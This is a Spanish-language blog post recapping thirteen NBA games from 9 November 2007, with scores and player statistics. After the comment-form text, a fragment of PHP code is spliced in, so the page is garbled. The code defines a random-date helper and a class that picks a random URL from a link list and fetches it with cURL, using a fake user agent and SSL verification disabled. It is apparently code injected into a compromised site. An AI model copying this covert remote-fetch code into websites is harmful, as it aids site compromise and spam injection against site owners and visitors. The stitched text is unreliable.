La crónica (9/11/07)

10 de November de 2007 por Pow_Brolin

La noche del viernes no dejo a nadie impasible, con 13 partidos para todos los gustos: presenciamos el despertar del Dragón dormido en la NBA con el duelo Yao vs Yi, sufrimos partidos con final ajustado (Toronto Vs Philadelphia, Cleveland Vs Sacramento y Utah Vs Seattle), se produjo la primera derrota de los Clippers, Boston sumó una nueva victoria y es el único imbatido y, en el reverso de la moneda, Minnesota, Seattle, Miami y Washington siguen sin ganar. Además, regresó Odom con buena actuación y triunfo de los Lakers.

Sin más dilación nos adentramos en la crónica diaria:

Raptors 105, 76ers 103

Toronto necesitó una de las mejores versiones de Trotamundos Parker (22 puntos) y la entereza de Bosh (24 puntos – 10 rebotes) para doblegar a unos incansables Sixers. El marcador siempre estuvo ajustado, al descanso Toronto se marchó al vestuario con una diferencia de +8 pero Philadelphia, de la mano de su jugador franquicia, Iguodala (26 puntos – 8 rebotes- 7 asistencias y 3 robos de balón) y el anotador Luis Williams (21 puntos) llegó al último minuto del partido con opciones serias de hacerse con el encuentro. Pero el buen hacer del dúo Bosh & Parker y la sabia gestión desde el banquillo de Mitchell decantaron el partido hacia los canadienses.

Pacers 87, Bobcats 96

Victoria trabajada de los Bobcats o según se mire lección magistral de Indiana para tirar un partido en el último cuarto. Un parcial de 14 a 31 en el tiempo final debería estar penado en la NBA y los jugadores, en prisión. El poderío de la triada Felton (17 puntos y dirección del partido estupenda), la bestia de los tableros Okafor (23 rebotes 25 puntos) y la anotación de G. Wallace (28 puntos) fue suficiente para pasar por encima de los Pacers.

Hawks 83, Celtics 106
Los halcones de Atlanta no fueron en ningún momento rival para el rodillo verde. KG con 19 rebotes, 6 asistencias y 27 puntos + Pierce 23 puntos + 14 de Allen = mantener la imbatibilidad de Boston en la NBA.

Suns 106, Heat 101
¡Ni tan siquiera tener a 4 jugadores por encima de los 20 puntos te asegura ganar a los Suns! Eso pensaron los aficionados de los Heats después de ver el partido. Haslem 20 – 13 , Shaq 25-10 , Jason Williams 21-10 y Ricky Davis 20 puntos llegaron fundidos al final del partido y echando en falta a su líder Wade. Los jugadores de los Suns se pusieron el mono de trabajo y finiquitaron el encuentro dirigidos por un fabuloso Nash 30 puntos 8 asistencias bien escudado por Hill, Marion, Bell y Barbosa (todos por encima de los 10 puntos).

Magic 112, Knicks 102
Orlando se alzo con la victoria en su feudo con un D Howard en plan dominante 22 puntos y 20 rebotes bien dirigido por Nelson 24 puntos y 10 asistencias pero si encima tus dos aleros altos Lewis & Turkoglu se van más allá de los 20 puntos… estamos ante un rival muy duro de pelar. En el bando Knick destacó una noche más Zach con sus 23 puntos y 13 rebotes.

Spurs 97, Hornets 85
Otra noche más los Spurs demostraron que son un EQUIPO (a pesar de la nefasta dirección desde el banquillo) y volvieron a ganar a unos Hornets que darán muchas sorpresas este año. Duncan (24-12) y Parker (27-8) se bastaron para doblegar al equipo de Paul (18 puntos y 7 asistencias).

Clippers 79, Pistons 103
No pudo ser… los Pistons acabaron con la imbatibilidad de los Clippers, que se vieron desbordados en todo momento por el rodillo de Detroit. Los 2 hombres de la noche fueron Billups 23 puntos y Kaman, consolidándose como uno de los mejores C’s de la liga con 25 puntos.

Nuggets 118, Wizards 92

Si Carmelo te anota 32 puntos y encima 6 de sus compañeros anotan más de 10 puntos la victoria es una mera utopía. Denver comienza a engrasar las piezas de su maquinaria y los Wizards no encuentran la manera de salir del pozo en el que se han metido: 0 victorias, 5 derrotas.

Bucks 88 – Rockets 104

El duelo Jianlian-Yao respondió a las expectativas. Ambos brillaron y los Rockets se anotaron una cómoda victoria fundamentada en su trabajo defensivo, que dejó a los Bucks por debajo del 40% de acierto. Yao logró 28 puntos, 10 rebotes y 3 tapones, con 14 de 14 en tiros libres, y McGrady añadió 21-8-8. Battier y Bonzi añadieron un buen trabajo para asegurar un nuevo triunfo pese a los 19 puntos y 9 rebotes de Jianlian.

Grizzlies 98 – Blazers 110

Aldridge destrozó a los Grizzlies con 30 puntos, 10 rebotes, 3 robos y 3 tapones, y contó además con 22 puntos de Roy, 21 de Jack y 17 de Webster para superar a Gasol & Co. en una segunda mitad demoledora: 37-61. Pau anotó 19 puntos pero estuvo limitado por las faltas, mientras Navarro apenas jugó. Los 31 de Gay no fueron suficiente.

Wolves 93 – Lakers 107

Regreso triunfal de Odom para los Lakers. Los angelinos se impusieron con comodidad a los Wolves, que volvieron a tener a Jefferson, 24-15, como su mejor hombre. Pero Bryant lideró a su equipo con 30 puntos, 7 rebotes, 7 asistencias y 4 recuperaciones, el resto del quinteto anotó al menos diez puntos y Bynum logró un doble-doble desde el banquillo. Odom dio buenas sensaciones, atacó el aro y estuvo efectivo con 7 de 10 en tiros. El ex Heat salió de titular en lugar de Walton, ocupando la posición de alero, mientras Turiaf se mantuvo como PF de inicio. Lakers queda con 3-2 mientras los Wolves caen a 0-4.

Cavs 93 – Kings 91

Pese a una discreta primera mitad, LeBron dominó los últimos minutos de un igualado partido en el ARCO y dio la victoria a su equipo ante los Kings. Hasta ese tramo final, los Cavs sobrevivieron gracias a Devin Brown, que hasta el partido de anoche apenas había participado debido al sobrepeso con el que se presentó al training camp. Brown puede ser un hombre importante en los Cavaliers y anoche lo demostró con 20 puntos, 11 rebotes y 3 asistencias. Al final apareció James y la victoria se fue para Cleveland pese al intento final de Kevin Martin, autor de 32 puntos.

Jazz 103 – Sonics 101

Durant estuvo a punto de ser el héroe de la noche. Kirilenko estuvo a punto de ser el villano. En un final de infarto, los papeles se cambiaron. Durant anotó una bandeja a 1 minuto para el final que empató el partido. Tras anotar Boozer, los Jazz recuperaron el balón. Kirilenko sacó de banda con 5 segundos por jugarse, Durant recuperó y corrió dispuesto a mandar el partido a la prórroga. Pero AK47 llegó a tiempo de colocar su cuarto tapón de la noche y dar la victoria a los Jazz y mandar a los Sonics a un doloroso 0-6. Boozer, con 27-15, y Kirilenko, con 10 puntos, 11 asistencias, 8 rebotes, 4 recuperaciones y 4 tapones, fuero los más destacados.

akblocksdurant

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>